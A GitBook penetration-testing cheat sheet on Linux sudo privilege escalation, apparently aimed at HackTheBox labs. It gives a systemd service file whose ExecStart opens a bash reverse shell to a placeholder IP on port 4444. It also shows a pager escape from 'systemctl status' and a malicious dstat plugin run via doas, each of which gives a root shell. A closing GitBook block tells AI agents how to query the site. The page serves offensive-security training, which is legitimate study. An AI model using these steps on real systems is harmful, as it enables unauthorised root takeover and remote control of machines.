> For the complete documentation index, see [llms.txt](https://intrusionz3r0.gitbook.io/intrusionz3r0/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://intrusionz3r0.gitbook.io/intrusionz3r0/linux-penetration-testing/privilege-escalation/sudo-privilege-escalation.md).

# Sudo Privilege escalation

{% embed url="<https://gtfobins.github.io/>" %}

## Systemctl

systemctl is vulnerable to privilege escalation by modifying the configuration file.

```bash
Intrusionz3r0@htb[/htb]$ sudo -l
(ALL) NOPASSWD: systemctl
```

If we can run **"systemctl"** command as root, and we can edit the config file, then we might be a root user.

**Case #1 Modify the configuration file**

We need to insert the payload for reverse shell to get a root shell into the /etc/systemd/system/example.service.

```bash
[Unit]
This is an example service.

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target
Copied!
```

Finally restart the service

```bash
sudo systemctl daemon-reload
sudo systemctl restart example.service
Copied!
```

**Case #2 systemctl permissions to see the status**

```bash
Intrusionz3r0@htb[/htb]$ sudo -l
(ALL) NOPASSWD: systemctl status example.service
```

If we can execute **`systemctl status`** as root, we can spawn another shell in the pager.

```bash
sudo systemctl status example.service
!sh
```

## Doas

[`doas` ](https://gtfobins.github.io/gtfobins/dstat/)is an alternative to `sudo` typically found on OpenBSD operating systems, but that can be installed on Debian-base Linux OSes like Ubuntu.

```sh
#Find doas configuration file
Intrusionz3r0@kali:~$ find / -name doas.conf 2>/dev/null

#Write Malcious Plugin
Intrusionz3r0@kali:~$ echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_Intrusionz3r0.py

#Execute
doas /usr/bin/dstat --Intrusionz3r0
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://intrusionz3r0.gitbook.io/intrusionz3r0/linux-penetration-testing/privilege-escalation/sudo-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.